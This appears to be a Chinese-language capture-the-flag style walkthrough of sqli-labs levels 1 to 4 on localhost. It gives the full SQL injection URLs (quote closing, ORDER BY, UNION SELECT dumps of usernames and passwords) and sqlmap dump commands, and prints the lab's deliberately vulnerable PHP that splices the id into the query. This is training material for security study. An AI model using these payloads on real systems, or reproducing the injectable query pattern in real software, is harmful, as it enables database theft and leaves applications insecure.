http://localhost/sqlilabs/practice/example1.php?id=1'
http://localhost/sqlilabs/practice/example1.php?id=1' %23 # %23 是 URL 编码后的 #，用来把查询中 id 后面剩余的部分注释掉；带上它页面恢复正常，说明单引号确实闭合了原有字符串
http://localhost/sqlilabs/practice/example1.php?id=1' order by 3%23 # 正常
http://localhost/sqlilabs/practice/example1.php?id=1' order by 4%23 # 页面显示错误
说明字段数为3
# 判断显示的信息点：用 id=-1 让原查询查不到任何行，这样页面回显的就是 union 后面那一行，哪个数字出现在页面上就说明哪一列会被输出
http://localhost/sqlilabs/practice/example1.php?id=-1' union select 1,2,3%23
http://localhost/sqlilabs/practice/example1.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
http://localhost/sqlilabs/practice/example1.php?id=-1' UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_schema ='sqlilabs' AND table_name='users' --+
http://localhost/sqlilabs/practice/example1.php?id=-1' UNION SELECT 1,group_concat(username SEPARATOR '-'),group_concat(password SEPARATOR '-') FROM users --+
将整个表内容显示出来了
```
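# sqlmap enumeration steps for the injection point found above.
# Only run these against targets you are authorised to test (here: the local lab).
# "注入地址" / "数据库" / "表名" / "字段" are placeholders to substitute.
# Note: the option prefix must be two ASCII hyphens ("--dbs"); a typographic
# en-dash and curly quotes are not parsed by sqlmap or the shell.
sqlmap -u "注入地址" -v 1 --dbs                                      # list databases
sqlmap -u "注入地址" -v 1 --current-db                               # current database
sqlmap -u "注入地址" -v 1 --users                                    # list DBMS users
sqlmap -u "注入地址" -v 1 -D "数据库" --tables                        # list tables in a database
sqlmap -u "注入地址" -v 1 -D "数据库" -T "表名" --columns              # list columns of a table
sqlmap -u "注入地址" -v 1 -D "数据库" -T "表名" -C "字段" --dump       # dump the selected columns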
```
http://localhost/sqlilabs2/Less-2/index.php?id=1'--+
http://localhost/sqlilabs2/Less-2/index.php?id=1 and 1=1--+
http://localhost/sqlilabs2/Less-2/index.php?id=1 and 1=2--+
说明执行了传入的payload,存在注入
http://localhost/sqlilabs2/Less-2/index.php?id=1 order by 3--+ # 正常
http://localhost/sqlilabs2/Less-2/index.php?id=1 order by 4--+ # 页面显示错误
说明字段数为3
http://localhost/sqlilabs2/Less-2/index.php?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = database()--+
http://localhost/sqlilabs2/Less-2/index.php?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'users' --+
http://localhost/sqlilabs2/Less-2/index.php?id=-1 union select 1,group_concat(username),group_concat(password) from users --+
Less-3：加上单引号后报错，页面回显的 MySQL 报错信息里多出一个 )，说明参数被 ('...') 包裹，闭合时要用 ')
http://localhost/sqlilabs2/Less-3/index.php?id=1') and 1=2 --+ # 报错
http://localhost/sqlilabs2/Less-3/index.php?id=1') and 1=1 --+ # 正常
直接上payload,将数据库脱出
http://localhost/sqlilabs2/Less-3/index.php?id=-1') union select 1,group_concat(username),group_concat(password) from users --+
Less-4：加上双引号后报错，报错信息里同样多出一个 )，说明参数被 ("...") 包裹，闭合时要用 ")
http://localhost/sqlilabs2/Less-4/index.php?id=1") and 1=2 --+ # 报错
http://localhost/sqlilabs2/Less-4/index.php?id=1") and 1=1 --+ # 正常
直接上payload,将数据库脱出
http://localhost/sqlilabs2/Less-4/index.php?id=-1") union select 1,group_concat(username),group_concat(password) from users--+
直接上payload 1-4关皆可以用该命令
sqlmap -u "http://localhost/sqlilabs2/Less-2/index.php?id=1" --batch -D security -T users --columns --dump
<?php
// sqli-labs Less-1 (single-quoted string id): the intentionally vulnerable
// reference target for the payloads above. Every weakness annotated below is
// by design of the lab, not something to "fix" here.

//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
// Suppresses PHP notices/warnings; MySQL errors are still echoed explicitly below.
error_reporting(0);

// take the variables
if(isset($_GET['id'])){
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
// NOTE(review): the raw, unvalidated id is appended to result.txt in the same
// directory as this script, so every payload sent to the page is persisted on disk.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity
// The injection point: $id is interpolated straight into the SQL string inside
// single quotes, so a leading ' in the parameter closes the literal and the
// trailing --+ / %23 in the payloads comments out the remaining ' LIMIT 0,1.
// NOTE(review): mysql_query/mysql_fetch_array are the legacy ext/mysql API;
// whether it is still available depends on the PHP version the lab runs on.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
// Success path echoes username and password of the first matching row, which
// is why a UNION row placed in columns 2 and 3 shows up on the page.
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
} else {
// Failure path echoes the raw MySQL error to the client; this is what reveals
// the quoting/parenthesis structure in the Less-3 / Less-4 notes above.
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
} else {
echo "Please input the ID as parameter with numeric value";
}
?></font> </div></br></br></br><center><img src="../images/Less-1.jpg" /></center></body></html>
-- Query shapes behind sqli-labs Less-1 .. Less-4. $id is the raw GET parameter
-- spliced into the SQL string (see the PHP listing above), so the attacker only
-- has to supply the right closing sequence before "--+" / "%23" comments out
-- the rest of the line.
-- Less-1: single-quoted string -> payload opens with '
SELECT * FROM users WHERE id='$id' LIMIT 0,1;
-- Less-2: bare numeric -> no quote needed (id=1 and 1=1--+)
SELECT * FROM users WHERE id=$id LIMIT 0,1;
-- Less-3: single-quoted and parenthesised -> payload opens with ')
SELECT * FROM users WHERE id=('$id') LIMIT 0,1;
-- Less-4: double-quoted and parenthesised -> payload opens with ")
SELECT * FROM users WHERE id=("$id") LIMIT 0,1;
[1]
关卡源码下载地址: https://github.com/Audi-1/sqli-labs
[2]
页面美化下载地址: https://github.com/himadriganguly/sqlilabs